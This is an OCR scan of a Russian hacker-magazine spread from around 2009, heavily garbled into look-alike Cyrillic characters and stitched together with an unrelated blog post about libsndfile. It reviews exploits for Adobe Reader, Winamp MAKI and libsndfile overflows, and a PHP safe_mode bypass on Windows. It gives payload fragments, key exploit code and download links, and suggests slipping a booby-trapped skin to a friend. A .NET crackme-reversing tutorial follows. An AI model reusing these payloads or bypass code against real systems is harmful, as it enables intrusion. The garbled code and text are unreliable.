0000000193 00000 п 
0000000098 00000 п 
0000000015 00000 п 
0000000052 00000 п 
0000000245 00000 п 
Сгаііег 
« 

/8І2Ѳ 7 

/КооС 1 0 К 

/ІБ [<с52 9463 971МЬе4сі5492 191411а983е2хс52 9463 971ЫЬе 
4(15492 191411а983е2>] 
х 

зБагБхгеТ 



I Ргі, 05 Дип 2009 

Зіт Неп50п Со. 

I гесеіѵесі ап етаіі Фіз тогпіпд: 



Ргот: Баѵіб XXX <ххх@сгеаіиге5Ьор.солі> 

То: < ег іксі@ххх . сот > 

5иЬ]есі ІіЬзшІШе изаде 

Баіе: ТЬи, 4 Іип 2009 10:52:02 -0700 

ІІзег-АдепІ : НогіІІа-ТЬипсІегЫкі 2.0.0.19 (Х11/20090103) 

Егік, іизі іЬоидЬі I ѵоиісі іаепііоп те Ьаѵе Ьееп изіпд ІіЬзшІШе 
іпіегпаііу аі іЬе Ли Непзоп Со. іог а ѵШе, те гесепііу доі арргоѵаі 
Іо ореп зоигсе золе оі оиг иШШез ѵЬісЬ юзНу изе ІіЬзпііШе Іо геасі 
іп таѵ Шез Іог епсоЛпд іпіо а диісШіе Ше, изіпд ІіЬдиіскіііае. Іе 
геіеазесі іЬе» аз изаде ехашріез апё ехігаз іог ІіЬчиіскіііе. 

ЬНр : //ІіЬфііскЦпе . сѵз . зоигсеіогде . пеі/ѵіеѵѵс/ІіЬдиісШпе/ЦЦиШз/ 



Баѵііі XXX 

Ріреііпе Тооіз Ргодгатег 
Ли Непзоп Сгеаіиге 5Ьор 
хххИсгеаіигеэЬор . сот 



ОГсоигзе Лт Непзоп апсі Сотрапу аге ргоЬаЫу Ьезі кпоѵѵп Фг Фе Мирреіз апсі Зезате Зігееі Ьиі а соиріе оі уеагз адо ту Феп Фиг уеаг 
ІоѵесІ дааФНІпд Веаг іп Фе Від ВІие Ноизе. 

Іп а зиЬзедиепІ етаіі ОаѵісІ ехріаіпесі Фаі Фе Веаг ргодгат ѵ/аз Ьеіоге Ніз ііте, апсі Фаі ІіЬзпсІііІе ѵѵаз Ьеіпд изесі аз рагі о! Фе гепсіег ргос 
о? Зій Фе Зсіепсе Кій ѵФісН I йопЧ Фіпк Наз геасНесІ Фіз соипФу уеі, 

Розіей аі: 21:06 1 Саіедогу: СойеНаскіпд/ІіЬзпйЛІе | Регтаііпк 



ТЕХНИЧЕСКОЕ ОПИСАНИЕ БАГА В ШБМОРИ-Е 



20452 

%%ЕОР 

Смотрим и видим, что в секции іпіі есть странный аіеіі, содержащий 4098 
байт мусора. Очевидно, что он и стал причиной падения. Какговорится, 
доверяй, но проверяй, поэтому я отредактировал файл, оставив лишь 10 
байт«мусора». В итоге, РОР’ка открылась без ошибок. 

Каков же вывод? Все просто, функция «арр.аІегШ» не содержит должную 
проверку на переполнение, в итоге, мы имеем безобидный 0о5. Подчер- 
киваю, именно безобидный, поскольку в приватных кругах наверняка 
ходит эксплойт, реализующий выполнение произвольного системного 
кода, который впоследствии будет использоваться в различных связках 
для «пробива» приватныхтроянцев. Поэтому мотай информацию на ус и 
немедленно обновляйся. 



» ЕхрІоіі| 



Вбей в адресную строку «зеси гііуіа Ь. ги/_сІоѵѵпІоасІ/ехрІоі1:5/2009/05/ 
абобе-геабег-боз.рбі» иувидишь... аварийноезакрытие браузера :). 



»Тагде1з| 



Уязвимыми являются все версии АсгоЬаІ Пеабег, включая релиз 9.1.1. 
Помни, что если ты жмякнешь на ссылку с ядовитым РОР-файлом, за- 
хлопнется и программа, которая инициировала его открытие. 



>>5оІи(іоп 



Обновляй читалку на официальном сайте «деі.абоЬе.сот/геабег». Тем 
самым ты защитишь свой компьютер от непрошеных гостей. 
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НИ КЧЕМУ НЕ ОБЯЗЫВАЮЩИЙ ЭКСПЛОЙТ ДЛЯѴѴІЫАМР 



_|\ !\ 

Если «отдебажить» парсинг. такі-файла, то мы получим следующую 
ка ртину: 

. СехС : 12 094Е62 1ос_12 094Е62 : 

. СехС : 12 094Р62 шоѵ ах , [еЬх] 

. СехС : 12 094Р65 тоѵзх есіі , ах ; зідп ехкепзіоп 
. СехС : 12094Р68 іпс еЬх 
. СехС : 12094Р69 ризЬ есіі ; Зіге 
. СехС : 12094Е6А іпс еЬх 

. СехС : 12094Р6В Іеа еах, [еЬр+МиІСіВуСеЗСг] 

. СехС : 12 094Р71 ризЬ. еЬх ; Зге 

. СехС : 12 094Р72 ризЬ. еах ; БзС, Ьиііег із ІосаСесІ іп СЬ.е 
зСаск 

. кехк : 12094Е73 саіі шешшоѵе 




ѴѴІЫАМР ВІІРРЕК ОѴѴЕРРЮѴѴ 
МІЛ.ТІРІ.ЕЕХРІ.0ІТ5 



» Вгіеп 



На этот раз не обошлось без музыкальныхжертв — под прицел багоиска- 
телей попал самый популярный ѴѴіпсІоѵѵз-рІауег — ѴѴіпатр от ІМиНзоІ! 

За один лишь месяц в нем было найдено две громких уязвимости, о 
которых я спешутебе рассказать. 

1. Какя уже писал, все продукты базируются на каких-либо компонент- 
ных библиотеках. И если в софте практически идеальный код, то уяз- 
вимость может находиться во вспомогательной библиотеке. Особенно 
тяжело положение, если исходники библиотеки закрыты (с одной сторо- 
ны, сложно найти уязвимость, но с другой — никто от нее в принципе не 
застрахован :]]. Но в случае с ѴѴіпатр — ба гтривиален. Умельцы нашли 
изъян в функциях «ѵос_геаб_Ьеабег(]» и «а ібб_геасІ_ЬеасІег(]», принадле- 
жащих библиотеке «ІіЬзпсІііІе» и читающих заголовки «.ѵос»- и «.аіИ»- 
файлов (по-видимому, обе функции написаны по одному алгоритму]. 

Если верить экспертам, в этих функциях содержится код, приводящий к 
переполнению динамической памяти. Какследствие, любой желающий 
может создать «.ѵос» или «.акЬ-файл со специальным заголовком, пос- 
ле чего ѴѴіпатр послушно выполнитпроизвольный системный код. 
Ксожалению, все ограничилось словами, и сплойтниктотаки не вы- 
ложил. Однакоутебя имеется вся информация кразмышлению, чтобы 
написатьсобственный сплойт(перерывай старые подшивки журнала и 
смотри статьи Криса — по подобным наводкам он это делал не раз ;]]. 

2. Ответь мне на простой вопрос: «Любишьлиты скины ѴѴіпатр, каклюб- 
лю их я?». На самом деле, шучу, но было время, когда я часами изучал 
различные шкурки от проигрывателя, останавливаясь на самом лучшем. 
Думаю, и сейчас есть фанаты модных скинов... Гхм, кчемуэто я? :] Короче 
говоря, совсем недавно обнаружили возможность переполнения буфера 
в парсере «МАКІ» (библиотека деп_Л.бЩ. Макі — это, собственно, и есть 
скрипты ѴѴіпатр’а, образующие скин (привязку кнопок, функционал 
и т.п.). Если углубиться в технические подробности, будет понятно, что 
механизм парсинга .такі состоит в последовательном чтении двух байт, 
отвечающихза длину. Если чуть увеличить эту дли ну, произойдет... пра- 
вильно — переполнение стека и аварийное завершение программы. А 
если чуток подумать и увеличить длину сумом, мы добьемся перезаписи 
адреса возврата и выполнение произвольного системного кода. Что и 
происходит в эксплойте. 

рауіоасі = " \х41»*16756 

рауіоасі += " \х74\х06\х90\х90 " 

рауіоасі += " \х32 \х55\хЕ0\х12 " # ипіѵегзаі р/р/г іп_шос1. 

(11 1 

рауіоасі += зЬеІІсосІе # саіс зЬеІІсосІе ігогп шеСазрІоіС 

В этом фрагменте эксплойта происходитсмещение строки на адрес 
шеллкода, который успешно вызовется после обработки .такі-файла. 



. СехС : 120951Е5 1ос_12 0951Е5 : 

. СехС : 12 095ІЕ5 шоѵ есіі , [еЬх] 

. кехк : 12 0951Е7 аскі еЬх, 4 
. СехС : 12 095ІЕА шоѵ ах , [еЬх] 

. СехС : 12095ІЕБ тоѵзх езі, ах ; зідп ехкепзіоп 
. кехк : 12095ІЕ0 іпс еЬх 
. СехС : 120951Е1 ризЬ езі ; Зіге 
. кехк : 12 0951Е2 іпс еЬх 

. СехС : 12 0951ЕЗ Іеа еах, [еЬр+ѵаг_10144 ] 

. кехк : 12 0951Е9 ризЬ еЬх ; Зге 

. СехС : 120951ЕА ризЬ еах ; Бзк, Ъиііег із ІосаСесІ іп СЬе 
зкаск 

. кехк : 12095ІЕВ саіі шешшоѵе 

Все испытания проводились на скине от « В і д Вепію», который ты 
можешь найти на официальном сайте. Файл тсѵсоге.такі находится в 
«РРОСРАМРІЕЕЗ/ѴѴіпатр/Зкіпз/ВепІю/ЗсгірІъ». Атеперь подумай, что 
будет, если аккуратно впарить якобы крутой скин своему сотоварищу? 
Правильно! Ноятебе этого не говорил :). 



»Тагде1в| 



Уязвимыми считаются: 

1. Библиотека «ІіЬзпсІіі Іе» до версии <= 1 .0.20, активно использующаяся 
в ѴѴіпатр. 

2. Сам ѴѴіпатрдо версии <=5.55. 



»5оІи(іоп 



Зайди на «ѵѵіпатр. сот» и обновись до последнего релиза. Благодаря 
своевременному оповещению разработчиков, багбыл исправлен втот 
же день. Хорошо это или нет— незнаю, но в любом случае в Сети еще 
осталось огромное количество уязвимых версий. 



|» ЕхрІОІІ:| 



По первому багу, какя уже сказал, эксплойта никто не предоставил. Зато 
по второму — их целыхдва. Один написан на Си ( зесигіМаЬ.ги/рос/ 
ехіга/380450.рЬр ). а второй на Питоне ( зесигіМаЬ.ги/рос/ехі: га/380454. 

еЫ- 




РНР <= 5.2.9 1_0САІ_5АРЕМ(Ю ВѴРА55 
ЕХРІ.ОІТІѴѴШ32) 



» ВгіеЯ 



Нашласьдырка и в самой свежей версии РНР, позволяющая 
осуществить обход ограничений «за! : е_тобе». Напомню, что 
взведенная в рбр.іпі опция «за! : е_тобе» не позволяет инк- 
лудить файлы, выполнять системные вызовы и т.п. Но багои- 
скатели нашли способ выполнения команд при включенном 



► 052 
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КАК НИ СТРАННО, ЭКСПЛОЙТ ДЕЙСТВИТЕЛЬНО РАБОТАЕТ :) 



«за1 : е_тосІе». Правда, только на ѴѴіпсІоѵѵБ-платформах. Почему 
только на ѴѴі псіоѵѵ5? 

Дело в том, что баг актуален лишь в силу специфики 05 и был про- 
пущен из-за кроссплатформенности РНР. Все дело в слэшах. Если 
в *піх-1іке системах «/изг/Ьіп/рбр» и «\изг\Ьі п\р И р» будут считаться 
совершенно разными строками (малотого, вторая строка вернет 
тебе ошибку], то ѴѴіпсІоѵѵз сочтет их вполне одинаковыми. К слову, это 
является одним из признаков характеристики целевой системы при 
ее изучении (Ретоіе 05 РіпдегргіпРпд). Например, если перед нами 
система со сбитыми ТТР, ѴѴіпсіоѵѵб 5і^е, а также модифицированным 
сетевым стеком, и у нас есть доступ к РТР или ѴѴеЬ-5егѵег’у, то можно 
сразу опознать ѴѴіпсіоѵѵб всеголишьпо двум запросам к файлу. 
Эксплойт, совсем недавно опубликованный командой АЬузззес 
[ аЬѵБББеБ.сот ]. представляетсобой два файла: рбр-сценарий «стб. 
рбр» и исполняемый «стсІ.ЬаІ:» (можно было реализовать баге исполь- 
зованием одного файла, нуда ладно]. 

Ключевой фрагмент сплойта такой: 

$сшса = $_КЕ0иЕЗТ [ ' СГПСІ' ] ; 

ІТ ($СШСІ) { 

$ЪаСсЪ. = Тореп ( "стсРЬаС" , "ѵѵ" ) ; 

ТѵѵгіСе ( $ЬаСсЬ , " $стс!>аЬузззес . СхС " . " \г\п" ) ; 

ТѵѵгіСе ( $ЬаЦсЬ , " ехіС " ) ; 

Тсіозе ( $ЬаСс]г) ; 

ехес ( " ХзСагС спкТ.ЬаС" ) ; 

есЬо "<сепЦег>" ; 

есТю " <Ь.1>АЬузззес . сот РНР 5.x ЗаТеМосі Вураззег</Ы>" ; 
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есТю "<СехСагеа гоѵѵз=20 со1з=60>" ; 
гедиіге ( " аЬузззес . СхС " ) ; 
есНо "</ЦехЦагеа>" ; 
есТю "</сепСег>" ; 

Как видишь, весь баг сводится ктому, что «за^тосіе» пропускает 
конструкцию «Ыагі стб.ЬаІ:», начинающуюся с символа «\». Команда 
записывается в «стсІ.ЬаР», который выводит ее результат в текстовик. А 
текстовый файл, в свою очередь, отображается на экране. Воттакой вот 
геморрой :]. 



I» ЕхрІОІІБІ 



Эксплойт берем по адресу а ЬѵБББес.сот/БаІетосІ -ѵѵіпбоѵѵБ.^ір или 
ті[уѵ0гт.сопп/5р[ор5/2009-5а1 : етосІ-ѵѵіпсІоѵѵ5.2Ір . Описание кэксплойту 
(менее подробное, чем в этом обзоре) можно изучить по ссылке зЗсип7у. 
огд/Іоса1.рбр?іс1=7 . 



|»ТагдеІ5| 



Уязвимыми являются все версии РНР, но помни, что интерпретатор 
должен быть установлен на ѴѴіпбоѵѵз-платформе. А как проверить 05, ты 
уже знаешь. 



>>5оІи(іоп 



В данный момент уязвимость не устранена. Но если позарез нужно из- 
бавиться от бага, просто запрети функцию «ехесО» или напиши парсер, 
убивающий все боковые еле ши. -гг 
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X МОРО / МОВО@ШВОХ.КІІ / 



1 



і 



Открытый+Закрытые 

ключи 



ТРУДНОСТИ 

ПЕРЕВОДА 



УЧИМСЯ ЛОМАТЬ .ЫЕТ-СБОРКИ 



Первая версия .І\ІЕТ впервые была представлена М іеговой в 2002 году. 
С тех пор утекло много воды, и на подходе уже 4-я версия фреймвор- 
ка. Число софтин растет быстрее, чем размножаются хомячки, 
а ты боишься к ним даже приблизиться. Пора разобраться, что к чему, 
и восстановить справедливость. 



ЗАГАДОЧНЫЙ ФРЕЙМВОРК 

Говоря о.ІЧЕТ, следует признать, что в М іеговой 
вовсе не дураки работают, и иногда в недрах 
корпорации рождаются поистине интересные 
решения. Я не буду вдаваться в подробности 
относительно противостояния .ІЧЕТ и баѵа, 
проводить детальные сравнения и меряться всем, 
чем можно. Фактналицо — .ІЧЕТ развивается и 
уже включен в официальную поставку новых ОС 
(Ѵіз1:а/2008/7] от М ісгозоИ М іеговой предостав- 
ляет нетолько среды разработки и исполнения, 
но и богатые библиотеки классов, позволяющие 
реализовать практически любой функционал 
пользовательского приложения. Совместное 



Неѵѵіей-Раскагсі и Іпіеібыли стандартизованы 
СЫ, С# И С++/СИ (ЕСМА-335, ЕСМА-334, ЕСМА- 
372, соответственно]. Это открыло дорогу для 
ІЧоѵеІІс их проектом Мопо, реализующим данные 
стандарты и позволяющим запускать приложе- 
ния ,І\ІЕТ на других, безоконныхоперационных 
системах. Місгозоіб делает ста в куна .І\ІЕТ какна 
лидирующую среду для создания приложения под 
0СѴѴіпбо\л/5,а,значит, и нам следует отнестись 
кней суважением и научиться справляться с 
потенциальнымитрудностями. Одним из несом- 
ненных преимуществ .ІЧЕТ является поддержка 
нескольких языков программирования. В первую 
очередь, это заостренный С (С#) и, конечно же, 



Вазіс в формате ѴВ.ІЧЕТ. В рамках одного проекта 
можно комбинировать сборки, разработанные 
на различных языках. Среда сама обеспечит 
корректность исполнения конечного решения. 
Каким же образом это достигается? Реализованы 
концепции песочницы, СЦ и ЛТ. 

ОЛЬГА, ПРОЩАЙ! 

На самом деле, все достаточно просто (здесь 
опять можно вспомнить о баѵа, но мы этого делать 
не будем]. Независимость отязыка программи- 
рования и от конечной платформы достигается 
за счет компиляции приложения не в нативный, 
а в промежуточный байт-код. Втерминологии 
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ШИФРУЕМ СБОРКУ 



МісгозоЙон носит название МЗіКМісгозой 
Іпіегтесііаіе Бапдиаде], а после стандарти- 
зации все называютего просто СІБ (Соттоп 
ІгЛегтесІіаІе Бапдиаде) или, еще круче, — ІБ. 

СБВ (Соттоп Бапдиаде РипБте] отвечаетза 
компиляцию байт-кода в нативный, обеспечивая 
его выполнение на целевой системе. При этом 
используется подход Л Т РизНп-Тіте], согласно 
которому компиляция производится оперативно 
по мере необходимости. 

Посмотрим, что представляет со бой .ЫЕТ-при- 
ложение глазами Ольги. Для этого создадим 
простенькое приложение ѴѴіпсІоѵѵз.Еогтз, содер- 
жащее одну кнопку и вызывающее МеззадеВох 
с сообщением «Неііо, ѴѴогІб» при ее нажатии. Не 
правда ли, оченьоригинально? 

Создал? Тогда грузи сборку в Ольгу и наслаж- 
дайся результатом. Приложение загрузилось, а в 
окне дизассемблера — пусто. Обидно до соплей. 
Точку входа не поймали и чего дальше делать — 
непонятно. Жмем паузу и переходим котладке 
программы. Ставим условную точку останова на 
ТгапзІаІеМеззадедля перехвата нажатий левой 
кнопки мыши (ѴѴМ_БВІЯТОШР: М50== 202]. 
Кликаем и погружаемся в транс — казалось бы, 
элементарный вызов МеззадеВох заставляет Ольгу 
совершать кучу действий и не дает никакого пони- 
мания логики работы программы. Наверное, не все 
такуж и ужасно, но сей фа кт заставляет задуматься 
о целесообразности использования классичес- 
ко го отл а д ч и ка дл я ра боты с . N ЕТ- сб о р ка м и . Ита к, 
продолжим поиск новых друзей-отладчиков. 

БРАТЬЯ-БЛИЗНЕЦЫ: 

ІЬАБМ И ІЮА5М 

Динамическое компилирование делает 
процедуру отладки практически невозможной 
для сложных приложений. Но зачем пытаться 
отлаживать нативный код, когда можно под- 
няться выше и работать на уровне ІБ? 

Первая проблема — какэтот самый код получить, 



имея под рукой тол ько би на рн и к. Для этого сама 
МісгозоЙ предлагает инструмент под названием 
ІЮА5М. Название выбрано неспроста (надеюсь, 
ты уже догадался, что к чему]. ІБ0А5М устанав- 
ливается автоматически при установке Ѵізиаі 
5ТисІіо,такчто, поверь, он утебя уже есть. 
Запускаем консоль студии (или просто подгру- 
жаем переменные среды с помощью скрипта 
ѵзѵагз32.Ьа1;] и запускаем іісіазт. Открываем наше 
приветливое приложение и утыкаемся в нечто по- 
хожее на диаграмму классов. Развертывая метод 
любого из классов, получаем его I И- код. С кодом 
мы разберемся немного позже, а сейчас прове- 
дем эксперимент. Выбираем меню Еііе Оитр 
и сохраняем код всего приложения в текстовый 
файл Батріеі.іі. После этого запускаем ІБА5М 
(угадай для чего): іІазтЗатрІеІ.іІ. Получаем 
файл с непонятным расширением ехе, запускаем 
и видим до боли знакомую форму. Перед нами 
простейший алгоритм патчинга приложений: 
•дизассемблируем код в ІБ-язык; 

• дампим втекстовый файл; 

• корректируем текст в любимой среде програм- 
мирования ака «Блокнот»; 

• собираем приложение из ІБ-кода. 

УЧИМ МАТЧАСТЬ 

Итак, ІБ. Неплохо хотя бы немного представлять, 
какписатьна I Б, скажешьты, и будешь абсолютно 
прав. Чтобы разбираться в логике работы, а тем 
более, иметь возможность ее изменять, нам нужно 
изучить азы языка. Этим сейчас и займемся. 

Для начала определимся с инструментом. «Блок- 
нот»— великая вещь, но хотелось бы иметь под 
рукой среду, обеспечивающую комфортную работу 
на всем цикле разработки: подсветку синтаксиса, 
автоматическую компиляцию и линковку, отладку. 
Напрашивается ѴізиаІЗіюсІіо.ан нет, МісгозоБне 
реализует поддержку I Б. Возможно, есть какие- 
нибудь плагины, но мне их найти неудалось. 

По большому счету, можно программировать прямо 




$сі(асЫа 





поре 



ОК 



Ѵаікіаіе 



СРАСКМЕ ОТЧАЯННО 
СОПРОТИВЛЯЕТСЯ 
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в ІБ, поэтому будем искать среду программирова- 
ния и отладки. Проеюговтакихдва: БІБЕ и ІБЮЕ#. 
Первый — редактор, позволяющий отлаживать 
исполняемый код. Самое смешное, что какраз ре- 
дактироватьон и не умеет (классно назвали]. Второй 
проект представляет собой полноценную среду 
программирования. Однако попытка импортиро- 
вать код, полученный из ІББАЗМ, приводит к невоз- 
можности компиляции (классная ЮЕ). В конечном 
итоге выбор пал на средуЭЬагрОеѵеІор, в которой 
можно создавать проекты с поддержкой ІБ. Такую 
же поддержку предоставляет МопоОеѵеІор, однако 
у меня он работать отказался, а то, что не работает, 
идетвтопку. Недостатки ЗЬагрБеѵеІор: отсутствует 
поддержка автодополнения и невозможна работа с 
диаграммами классов. 

Напишем небольшое консольное приложение, 
на примере которого рассмотрим основные язы- 
ковые конструкции. Программа будет складывать 
два числа и выводить их сумму. 

Вся программа состоитиз набора директив и 
команд. Директивы начинаются с сим вола точки и 
реализуют декларативные функции: 

• .аззетЫу — объявляет определение манифеста 
и указывает, какой сборке принадлежиттекущий 
модуль; 

• .теіЬосІ — объявляет метод; 

• .епігуроіпі: — объявляет, что указанный метод 
реал изуетточку входа в приложение; 

• .тахзіаск — указываетмаксимальное коли- 
чество слотов в стеке для передачи параметров 
функции; 

•.Іосаіз — объявляетлокальные переменные 
метода. 
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Для описания команд 
ІІ_ бегом на М50Ы: 
ШрУ/тзсІп. 
тісгозоИсот/еп- 
из/ІіЬгагу/зузІюпп. 
геЛесбоп.етіЕ 
орсосіез ЕеШз.азрх 
Интересуют средства 
защиты .ІЧЕТ-при- 
ложений? Тогда тебе 
сюда: 

• ѵѵѵѵѵѵ.собеѵѵаЦ.пеІ: 

• ѵѵѵѵѵѵ.сЫІ-каІзоІТ. 
сот/сІоіІМеЮгѵрЕазр 

• ѵѵѵѵѵѵ.ехігіх.сот 

• ѵѵѵѵѵѵ.хИео.сот/ 
ргобисіз/собеѵеіі/ 
беіаии.азрх 



Описание всех директив ты найдешь в официальном докумен- 
те Сотгтюп І_апдиаде ІпбгазІгисЕиге (СЫ), Рагббоп II: Меіабаіа 
□екпШопапбЗеппапбсз на нашем диске. 

Вся логика работы приложения реализуется с помощью 
команд. Полный их переченьты можешь найти в М50ІМ [ ЫТр:// 
тзбп.тісгозоІТсот/еп-ивЛіЬгагѵ/зѵБІет.гейесбоп.еппіІ. 
орсосіез. [сИеп.азрх ). Учти, что символы подчеркивания нужно 
заменятьна символыточки. Любая операция в МЗИисполня- 
ется на стеке. Перед вызовом какой-либо смысловой команды, 
например, вызова функции, в стек кладутся ее параметры. Это 
очень похоже на ассемблер, однако в отличие от распростра- 
ненных конвенций вызова зІсІсаНи сбесі, переменные кладутся 
втом порядке, в котором они определены в прототипе функции. 
За установку переменных в стекотвечают команды семейства 
1<±.. Например, ІсНос загружает локальную переменную по 
ееимени или порядковому номеру, Ісізіт предназначена для 
загрузки строки. Обратную операцию осуществляют команды 
зі.. (зіоге), забирающиезначение с вершины стека в локаль- 
ную переменную. Очисткой стека занимается сама вызываемая 
функция, — после чего на вершину стека она кладет возвраща- 
емое значение. После объявления переменных (конструкция іпіШ 
предназначена для инициализации переменныхзначениями по 
умолчанию) производится вызов функции ѴѴгііе. Для этого в стек 
кладется строка с сообщением, которое будет выведено на экран. 
Далее используется команда саіі, вызывающая статический ме- 
тод ѴѴгйе из класса Бузует. Сопзоіе сборки тзсогііб. При вызове 
указывается прототип функции, — чтобы компилятор мог опреде- 
лить, какую из перегрузок использовать. При вызове нестатичес- 
кихметодовпередпараметрамивстекнужноположитьссылкуна 
экземпляр класса, а при вызове после саіі нужно поставитьключе- 
вое слово іпзіапсе. Для вызова виртуальных методов применяй 
саИѵігІ Далее вызывается функция ВеасНіпе, и строка парсится в 
число, которое сохраняется в первой переменной. Перед вызовом 
функции вывода на экран результатов переменные в стеке подвер- 
гаются преобразованию в ссылочныетипы (обертки) с помощью 
команды Ьох32. Остальноедолжно бытьясно без пояснений. Еще 
один важный момент для реверсера — это отлов ветвлений. В 
И ветвления создаются с использованием семейства команд 
Ь... (отЬгапсб). За детализацией беги на МЗОЫ. 

ПОПРОБУЙ СЛОМАЙ МЕНЯ 

Уже чувствуешь себя крутым? Тогда пора что-нибудь да поло- 
мать. Идем на любой сайте чел енджа ми и скачиваем задание 




ОЛЬГАЯВНО НЕ ПРИСПОСОБЛЕНА ДЛЯ 
АНАЛИЗА. ЫЕТ-СБОРОК 



из раздела сгаскіпд в стиле .І\ІЕТ. Я тебе покажу на одном из 
них, каквее просто и красиво. Изэтическихсоображений рас- 
крывать ресурс я не буду, но если интересно, можешь выяснить 
и сам, посмотрев внимательно внугрьбинарника. 

Приложение аррі 4 содержит на форме текстбокс и кнопку. В 
текстбокс нужно ввести правильную фразу, тогда обработчик 
кнопки выведет кодовое слово, которое и является решением. 
При неправильной фразе выводится какая-то л а буда. 

Забыл сказать: для редактирования ІЕоченьудобно использо- 
вать утилуРеб баіе’з.ІЧЕТВеЯесІюгсустановленным плагином 
ВеЯехіІ. Утила хороша тем, что на основе ІИ восстанавливает 
код на некоторых языках высокого уровня, включая шарп. 
Реверсинг превращается в увлекательное занятие анализа 
исходных кодов. Итак, загружаем в Пейесіюг нашего подопыт- 
ного и смотрим саммари по классам и методам. Видим два 
класса — Епсгурі и, собственно, класс формы под названием 
доез. Можно вкуривать в реализацию Епсгурі: — она не- 
сложная, но я предпочел посмотреть, что же происходит при 
нажатии заветной кнопки. Обработчик ищется элементарно, 
по прототипу функции. Она должна принимать два параметра: 
первый типа оЬ)ес1: и второй типа ЕѵепіАгдз. Таких функций 
всего две и по названию очевидно, что нам интересна функция 
ѵІа_СІіск. Выбираем по правой кнопке меню ОізаззетЫе и 
видим чистый с#! 



А Политика разглашения 

информации об уязвимости 

Это соглашение имеет ряд нюансов. На- 
пример, хакер, обнаруживуязвимость, ищет контакты, 
чтобы направить соответствующий запрос произво- 
дителю. Если по истечении пяти дней производитель 
отмалчивается, вводит в заблуждение своих пользова- 
телей какими-то способами или некорректно вступает в 
диалог, то ему отправляется повторное письмо. Выжи- 
даются еще пять рабочих дней, после чего баг-хантер 
вправе помещатьописаниео баге на собственном 
ресурсе или в публичные багтраки. При этом в письме 
требуется оговорить и согласовать дату публикации, 
чтобы производительуспел выпустить обновление или 
советы по защите от эксплуатации. Важно отметить, что 
если стороннеетретьелицо опубликовало данные об 
эксплуатации найденной тобой уязвимости, ты можешь 
смело постить ее подробности без согласования с кем- 
либо. Воттакая арифметика. 
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ВЕРІ.ЕСТОК ПОКАЗЫВАЕТ ИСХОДНЫЙ КОД НА С# 



Код обработчика нажатия кнопки в СгаскМе 

ргіѵаке ѵоісі ѵ1а_С1іск( 
окдеск зепсіег, 

ЕѵепкАгдз е) 

{ 

[] пишАггау = пей іпк [12] ; 

ѴагіапкТуре куре = (ѴагіапкТуре) 

Сопѵегзіопз . Тоіпкедег ( 

МуРгоз еск . Сотрикег . Кедізкгу . СекѴаіие ( 

@ " НКЕУ_СІТККЕЫТ_ІТ8'ЕК.\ѵа1ісі" , "" , 0) ) ; 

сіесітаі пит = пеѵі сіесітаі ( ( ( ( (сЗоиЫе) куре) 

+ 1.5) * ( (сіоиЫе) куре) ) + 0.025); 

ік (кіііз . кхк . Техк == " зотегапсіотѵі " ) 

{ 

Іпкегаскіоп . МздВох (КипкітеНеІрегз . 
СекОЬ^ескѴаІие (Епсгурк . 

РагзеапсіБесгурк (Сопѵегзіопз . 

ТоЗкгіпд (Епсгурк . РагзеапсіЕпсгурк ( 
"у^ХХ’ік пок кхк із ЫаЬ уоикаііесі" ) ) ) ) , 
МздВохЗкуІе . Ехсіатакіоп, " 585ткд9дк " ) ; 

} 

еізе 

{ 

Іпкегаскіоп .МздВох (КипкітеНеІрегз . 



СекОЬз ескѴаІие ( Епсгурк . РагзеапсТБесгурк ( 
"усІХХ ! ік пок кхк із ЫаН уоикаііесі" ) ) , 
МздВохЗкуІе . Ехсіатакіоп, " 585ткд9дк " ) ; 







ік (Сопѵегк . ТоБоиЫе (пит) == (((((сІоиЫе) 
куре) +1.5) * (( сіоиЫе) куре)) + 0.025)) 

{ 

ік ( (куре == ѴагіапкТуре . Етрку ) I 
(МуРгоз еск . Арріісакіоп . Іпко . БігескогуРакН . 
ЬепдкН . ТоЗкгіпд ( ) . ЬепдкН == Охіса) ) 

{ 

Іпкегаскіоп .МздВох ( "поре" , 

МздВохЗкуІе . Іпкогтакіоп , " зоггу" ) ; 

} 

еізе ік ((( (кНіз . кхк .Техк !=кНіз.кхк. 
Техк) & каізе) I каізе) I (куре == ѴагіапкТуре . 
Ш11) ) 

{ 

кМз . кхк . Техк = Сопѵегзіопз . ТоЗкгіпд ( 
Епсгурк . РагзеапсШесгурк ( 

" кт' { к}кршгп" ) ) ; 

} 

} 

} 



> ѵѵагпіпд 

Наилучшую защи- 
ту своих сборокот 
анализа ты получишь 
в случае исполь- 
зования Хепособе 
Р 05 І В и і ІСІ ( Шр:/у 
ѵѵѵѵѵѵ.хепособе.сопп/ 
ргобисТз/розТЬиіІб- 
•Гог-пек ]. позволяю- 
щего компилировать 
приложение в натив- 
ный код со стати- 
ческим включением 
сторонних сборок. 
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// Загружаем в стек строку 
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ггІ » г Ь Ю 



5НАКР0ЕѴЕІ.0Р В ДЕЙСТВИИ 



Выполняется куча каких-то проверок и срав- 
нений, которым надо удовлетворить. Моеже 
внимание привлекла последняя инструкция 
ШІ5.Ш.ТехІ = Сопѵег5Іоп5.То5ігіпд(Епсгур1:. 

Ра гзеапсЮесгурІіС'І'т ' {Окрѵѵгп")) 

Нуда, при правильном раскладе втекстбокс 
попадаетзначение, представляющее собой рас- 
шифрованную строку «іт ' Шкрѵѵгп». Собственно 
алгоритм расшифровывания реализуется функ- 
цией РагзеапсЮесгурІ: из класса ЕпсгурЕ Дальше 
можно либо разбираться в алгоритме (зачем 
оно нам надо?], либо скопировать код функции и 
скомпилироватьсобственный проеет.либо просто 
сделать один верный прыжок. 

Запускаем гейехіІизменюТооІзи видим ІІ_-код. 
Нужно идентифицировать место последнего и 
прыгнутьснегона выявленную команду. В Пнет 
операторов ветвления, поэтомуони реализуются 
в виде последовательности простых команд срав- 
нения и прыжков. Здесь все какв ассемблере. 
Итак, ищем последний переход перед выводом 
МеззадеВох с сообщением поре. 



Локализация перехода 



ІЪ_00І2 

іъ_ооі7 

ІЪ_00і9 

ІЬ_00іа 



Ісіс . І4 
сед 



Охіса 



ІЬ_00іс 

ІЬ_0101 

ІЬ_0103 

ІЬ_0108 



ІсізСг 
Ісіс .14.3 
ІсізСг 
саіі 



" поре " 

64 

" зоггу " 
ѵаіиеСуре 



Ьгіаізе.з ІЬ_0110 



[МісгозоіС .ѴізиаІВазіс] МісгозоіС . 
ѴізиаІВазіс . МздВохВезиШ 
[МісгозоіС .ѴізиаІВазіс] 

МісгозоіС .ѴізиаІВазіс . 

ІпВегасСіоп: :МздВох (оЬ^есС , 
ѵаіиеСуре [МісгозоіС .ѴізиаІВазіс] 
